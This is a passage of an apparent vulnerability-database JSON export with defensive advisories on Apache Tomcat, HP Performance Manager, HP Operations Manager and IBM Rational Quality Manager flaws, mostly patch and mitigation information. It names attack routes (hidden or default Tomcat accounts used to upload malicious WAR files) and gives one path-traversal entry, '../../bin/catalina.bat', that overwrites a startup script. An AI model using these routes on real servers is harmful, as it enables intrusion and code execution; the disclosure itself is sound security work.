[3]\r\n\r\nReferences:\r\n[1] http://svn.apache.org/viewvc?view=revision&amp;revision=834047\r\n[2] http://markmail.org/thread/wfu4nff5chvkb6xp\r\n[3] http://tomcat.apache.org/security.html\r\n\r\nMark Thomas\r\n", "edition": 1, "cvss3": {}, "published": "2009-11-09T00:00:00", "title": "[SECURITY] CVE-2009-3548 Apache Tomcat Windows Installer insecure default administrative password", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3548"], "modified": "2009-11-09T00:00:00", "id": "SECURITYVULNS:DOC:22764", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22764", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:33", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nCVE-2009-3548: Apache Tomcat unexpected file deletion and/or alteration\r\n\r\nSeverity: Low\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nTomcat 5.5.0 to 5.5.28\r\nTomcat 6.0.0 to 6.0.20\r\nThe unsupported Tomcat 3.x, 4.x and 5.0.x versions may be also\r\naffected.\r\n\r\nDescription:\r\nWhen deploying WAR files, the WAR files were not checked for directory\r\ntraversal attempts. This allows an attacker to create arbitrary content\r\noutside of the web root.\r\n\r\nMitigation:\r\n6.0.x users should upgrade to 6.0.24 or apply this patch:\r\nhttp://svn.apache.org/viewvc?rev=892815&amp;view=rev\r\n5.5.x users should upgrade to 5.5.29 when released or apply this patch:\r\nhttp://svn.apache.org/viewvc?rev=902650&amp;view=rev\r\nNote: the patches also address CVE-2009-2901 and CVE-2009-2902.\r\nAlternatively, users of all Tomcat versions may mitigate this issue by\r\nmanually validating the contents of untrusted WAR files before deployment.\r\n\r\nExample:\r\nA WAR file that contains the following entry will overwrite the standard\r\nWindows start-up script when deployed on a default Tomcat installation:\r\n../../bin/catalina.bat\r\n\r\nCredit:\r\nThis issue was reported to the Apache Tomcat security team by Marc\r\nSchoenefeld of the Red Hat Security Response Team\r\n\r\nReferences:\r\n[1] http://tomcat.apache.org/security.html\r\n\r\nMark Thomas\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 &#40;Darwin&#41;\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niQIcBAEBAgAGBQJLXMF6AAoJEBDAHFovYFnniGcP/j9ZyFlLdzcTxJLqqWyAOdUt\r\nJ1jF8vZTIqkf/vFyrRxLgw9ihaKZQ1wpd9U3vdHulcIsuAeBtiZgIhlXKItJiTLf\r\nImsEl5a3w3Ucp2Z71/IIRxmcffz/zIjgdzmhmnRDEhiHz/wiygpRr7X1M8ZgZVXe\r\nitxFDhZu7ccWDTwUkxOoFuG6CWxb6/red3l5CaL4OtcWBTZ1aqQ5M1Io62pWErLI\r\n6F/xuGTvWn4AeXaNEgJOGFZLLyX06WQJSzaJXh/tPqI153mk5Or63m03uJy9wHqa\r\np7ULRvRNSZ57m8L08e397uCjvu4CPGf1Rm0dDDART7UaLF1Q13gP9O6DPCS88wN+\r\nypgZTERSG9t0iMHZCKNjH1huRJDVPkEJwvGdtH0wGzFwg5S+oJ/J5ETW29dQ/JUR\r\npt1U1Xz6RnzFFgQR4Xomdc4SPysDFOIAexi8dkZPDcafN7YyiMQTRyU3iNRuoaR1\r\nY32qWfqJrmVDWQ1J4BLYsrLrpgZ0s5ccq6omz36lbH+3blyVPf1th84lWg9GG6lo\r\nW3qsnJIpNfxLi9II9sDxbVpUJXLVbJmBexUDR3z9BayowNtBlwMWXEZluctGe2DO\r\nhIkNB0D33AJvMD7wY80tnXY/hH3X5Vs+ZePEmu7TQB1KXzTinEbVdNVPF8/8woaL\r\n7iN004jxhnUxQc8Fgwj4\r\n=/B5h\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2010-01-26T00:00:00", "title": "[SECURITY] CVE-2009-2902 Apache Tomcat unexpected file deletion in work directory", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-2901", "CVE-2009-2902", "CVE-2009-3548"], "modified": "2010-01-26T00:00:00", "id": "SECURITYVULNS:DOC:23112", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23112", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:34", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02181353\r\nVersion: 1\r\n\r\nHPSBMA02535 SSRT100029 rev.1 - HP Performance Manager, Remote Unauthorized Access, Cross Site Scripting &#40;XSS&#41;, Denial of Service &#40;DoS&#41;\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-05-17\r\nLast Updated: 2010-05-17\r\n\r\nPotential Security Impact: Remote unauthorized access, cross site scripting &#40;XSS&#41;, Denial of Service &#40;DoS&#41;\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP Performance Manager. The vulnerabilities could be exploited remotely to allow unauthorized access, cross\r\nsite scripting &#40;XSS&#41;, and Denial of Service &#40;DoS&#41;.\r\n\r\nReferences: CVE-2008-5515, CVE-2009-0033, CVE-2009-0580, CVE-2009-0781, CVE-2009-0783, CVE-2009-2693, CVE-2009-2901, CVE-2009-2902, CVE-2009-3548\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Performance Manager v8.10, v8.20, v8.21 running on HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2008-5515 &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41; 5.0\r\nCVE-2009-0033 &#40;AV:N/AC:L/Au:N/C:N/I:N/A:P&#41; 5.0\r\nCVE-2009-0580 &#40;AV:N/AC:M/Au:N/C:P/I:N/A:N&#41; 4.3\r\nCVE-2009-0781 &#40;AV:N/AC:M/Au:N/C:N/I:P/A:N&#41; 4.3\r\nCVE-2009-0783 &#40;AV:L/AC:L/Au:N/C:P/I:P/A:N&#41; 3.6\r\nCVE-2009-2693 &#40;AV:N/AC:M/Au:N/C:N/I:P/A:P&#41; 5.8\r\nCVE-2009-2901 &#40;AV:N/AC:M/Au:N/C:P/I:N/A:N&#41; 4.3\r\nCVE-2009-2902 &#40;AV:N/AC:M/Au:N/C:N/I:P/A:N&#41; 4.3\r\nCVE-2009-3548 &#40;AV:N/AC:L/Au:N/C:P/I:P/A:P&#41; 7.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities.\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nHP Performance Manager v8.10, v8.20, v8.21\r\n\r\nOperating System\r\n Required Patch\r\n\r\nHP-UX &#40;IA&#41;\r\n HPPM8CPI_00001\r\n\r\nHP-UX &#40;PA&#41;\r\n HPPM8CPP_00001\r\n\r\nLinux\r\n HPPM8CPL_00001\r\n\r\nSolaris\r\n HPPM8CPS_00001\r\n\r\nWindows\r\n HPPM8CPW_00001\r\n\r\nMANUAL ACTIONS: No\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP\r\nand lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see\r\nhttps://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS &#40;for HP-UX&#41;\r\n\r\nFor HP Performance Manager v8.20\r\nHP-UX B.11.31 &#40;IA&#41;\r\nHP-UX B.11.23 &#40;IA&#41;\r\n=============\r\nHPOvLcore.HPOVXPL\r\nHPOvLcore.HPOVSECCO\r\nHPOvLcore.HPOVBBC\r\nHPOvJext.HPOVJXPL\r\nHPOvJext.HPOVJSEC\r\nHPOvJext.HPOVJBBC\r\nHPOvLcore.HPOVCTRL\r\nHPOvAcc.HPOVJREB\r\nHPOvAcc.HPOVTOMCATB\r\nHPOvPerf.HPOVJPACC\r\naction: install HPPM8CPI_00001 or subsequent\r\n\r\nFor HP Performance Manager v8.10\r\nHP-UX B.11.31.&#40;PA&#41;\r\nHP-UX B.11.23 &#40;PA&#41;\r\nHP-UX B.11.11\r\n=============\r\nHPOvLcore.HPOVXPL\r\nHPOvLcore.HPOVSECCO\r\nHPOvLcore.HPOVBBC\r\nHPOvJext.HPOVJXPL\r\nHPOvJext.HPOVJSEC\r\nHPOvJext.HPOVJBBC\r\nHPOvLcore.HPOVCTRL\r\nHPOvAcc.HPOVJREB\r\nHPOvAcc.HPOVTOMCATB\r\nHPOvPerf.HPOVJPACC\r\naction: install HPPM8CPP_00001 or subsequent\r\n\r\nEND AFFECTED VERSIONS &#40;for HP-UX&#41;\r\n\r\nHISTORY\r\nVersion:1 &#40;rev.1&#41; - 17 May 2010 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the\r\ncustomer&#39;s patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&amp;langcode=USENG&amp;jumpid=in_SC-GEN__driverITRC&amp;topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber&#39;s choice for Business: sign-in.\r\nOn the web page: Subscriber&#39;s Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing &amp; Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of\r\nsoftware products to provide customers with current secure solutions.\r\n\r\n&quot;HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained\r\nin this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not\r\nwarrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from\r\nuser&#39;s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including\r\nthe warranties of merchantability and fitness for a particular purpose, title and non-infringement.&quot;\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided &quot;as is&quot; without\r\nwarranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential\r\ndamages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software\r\nrestoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein\r\nare trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 &#40;GNU/Linux&#41;\r\n\r\niEYEARECAAYFAkvxl94ACgkQ4B86/C0qfVkpIgCg2HZGPBdFrcWqb3R/rhxtIIXx\r\n2tsAn09dClLcnBbqIQ0k/0CEyVKebrYn\r\n=aN30\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2010-05-20T00:00:00", "title": "[security bulletin] HPSBMA02535 SSRT100029 rev.1 - HP Performance Manager, Remote Unauthorized Access, Cross Site Scripting &#40;XSS&#41;, Denial of Service &#40;DoS&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-0033", "CVE-2009-2693", "CVE-2009-0580", "CVE-2009-0781", "CVE-2008-5515", "CVE-2009-2901", "CVE-2009-0783", "CVE-2009-2902", "CVE-2009-3548"], "modified": "2010-05-20T00:00:00", "id": "SECURITYVULNS:DOC:23892", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23892", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:58:45", "description": "Unauthorized access, crossite scripting, DoS.", "edition": 2, "cvss3": {}, "published": "2010-05-20T00:00:00", "title": "HP Performance Manager multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-0033", "CVE-2009-2693", "CVE-2009-0580", "CVE-2009-0781", "CVE-2008-5515", "CVE-2009-2901", "CVE-2009-0783", "CVE-2009-2902", "CVE-2009-3548"], "modified": "2010-05-20T00:00:00", "id": "SECURITYVULNS:VULN:10852", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10852", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:01:54", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:5DF2E8BB0ECF29725510E3173971EDE5", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-29T16:40:31", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:88789BF22A82B3B79355F9F1C375C644", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:32", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:94DD62E7D4C2602EDF0704F85789EDD0", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:35:11", "description": "Added: 06/18/2010 \nCVE: [CVE-2009-3843](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3843>) \nBID: [37086](<http://www.securityfocus.com/bid/37086>) \nOSVDB: [60317](<http://www.osvdb.org/60317>) \n\n\n### Background\n\n[HP Operations Manager](<https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-15-28_4000_100__>) is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. \n\n### Problem\n\nA hidden Apache Tomcat account allows remote attackers to use the org.apache.catalina.manager.HTMLManagerServlet class to upload arbitrary files, leading to arbitrary code execution. \n\n### Resolution\n\nApply the patch referenced in [HPSBMA02478 SSRT090251](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01931960>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-09-085/> \n\n\n### Limitations\n\nExploit works on HP Operations Manager A.08.10 on Windows Server 2003 and Windows Server 2008. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-06-18T00:00:00", "type": "saint", "title": "HP Operations Manager hidden Tomcat account", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2010-06-18T00:00:00", "id": "SAINT:7CC6DA9BCE40E1A4453714BA7B40AFF7", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/hp_operations_manager_hidden_tomcat_account", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "description": "Added: 11/05/2010 \nCVE: [CVE-2010-4094](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4094>) \nBID: [44172](<http://www.securityfocus.com/bid/44172>) \n\n\n### Background\n\nIBM Rational Quality Manager is a web-based centralized test management environment for test planning, workflow control, tracking and metrics reporting. IBM Rational Quality Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\nIBM Rational Test Lab Manager integrates fully with Rational Quality Manager and helps to improve the efficiency of the test lab and optimize how resources are requested and provided. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in IBM Rational Quality Manager. IBM Rational Quality Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### Resolution\n\nDownload the fix for IBM Rational Quality Manager 2.0.1 from [IBM](<http://download4.boulder.ibm.com/sar/CMA/RAA/013m6/0/Rules-Update-749.exe>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-214/> \n\n\n### Limitations\n\nExploit works on IBM Rational Quality Manager 2.0.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "IBM Rational Quality Manager and Test Lab Manager Policy Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-4094"], "modified": "2010-11-05T00:00:00", "id": "SAINT:627454943189EB0A2BD02D71CE81E15E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/ibm_rational_quality_manager_default_credentials", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-07-28T14:33:40", "description": "Added: 11/05/2010 \nCVE: [CVE-2010-4094](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4094>) \nBID: [44172](<http://www.securityfocus.com/bid/44172>) \n\n\n### Background\n\nIBM Rational Quality Manager is a web-based centralized test management environment for test planning, workflow control, tracking and metrics reporting. IBM Rational Quality Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\nIBM Rational Test Lab Manager integrates fully with Rational Quality Manager and helps to improve the efficiency of the test lab and optimize how resources are requested and provided. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in IBM Rational Quality Manager. IBM Rational Quality Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### Resolution\n\nDownload the fix for IBM Rational Quality Manager 2.0.1 from [IBM](<http://download4.boulder.ibm.com/sar/CMA/RAA/013m6/0/Rules-Update-749.exe>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-214/> \n\n\n### Limitations\n\nExploit works on IBM Rational Quality Manager 2.0.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "IBM Rational Quality Manager and Test Lab Manager Policy Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4094"], "modified": "2010-11-05T00:00:00", "id": "SAINT:0DA3E83ACADF15B0430714C34348CD54", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ibm_rational_quality_manager_default_credentials", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-26T11:35:35", "description": "Added: 11/05/2010 \nCVE: [CVE-2010-4094](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4094>) \nBID: [44172](<http://www.securityfocus.com/bid/44172>) \n\n\n### Background\n\nIBM Rational Quality Manager is a web-based centralized test management environment for test planning, workflow control, tracking and metrics reporting. IBM Rational Quality Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\nIBM Rational Test Lab Manager integrates fully with Rational Quality Manager and helps to improve the efficiency of the test lab and optimize how resources are requested and provided. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in IBM Rational Quality Manager. IBM Rational Quality Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### Resolution\n\nDownload the fix for IBM Rational Quality Manager 2.0.1 from [IBM](<http://download4.boulder.ibm.com/sar/CMA/RAA/013m6/0/Rules-Update-749.exe>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-214/> \n\n\n### Limitations\n\nExploit works on IBM Rational Quality Manager 2.0.1 on Microsoft Windows Server 2003 and Windows Server 2008. \n\nIt may take longer than usual to establish the connection after successful exploitation because it takes time for the affected server to deploy the malicious WAR file. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2010-11-05T00:00:00", "type": "saint", "title": "IBM Rational Quality Manager and Test Lab Manager Policy Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4094"], "modified": "2010-11-05T00:00:00", "id": "SAINT:9A1ED7FEFFB0C7A0F9E21A50DD99400B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/ibm_rational_quality_manager_default_credentials", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-29T16:40:10", "description": "Added: 11/05/2010 \nCVE: [CVE-2010-4094](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4094>) \nBID: [44172](<http://www.securityfocus.com/bid/44172>) \n\n\n### Background\n\nIBM Rational Quality Manager is a web-based centralized test management environment for test planning, workflow control, tracking and metrics reporting. IBM Rational Quality Manager incorporates Apache Tomcat 5 to help serve custom web applications. \n\nIBM Rational Test Lab Manager integrates fully with Rational Quality Manager and helps to improve the efficiency of the test lab and optimize how resources are requested and provided. \n\n### Problem\n\nAn unauthorized file upload vulnerability exists in IBM Rational Quality Manager. IBM Rational Quality Manager generates credentials for a default user/password combination in Apache Tomcat. A remote attacker can leverage this vulnerability by sending a crafted HTTP request using the default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system. \n\n### 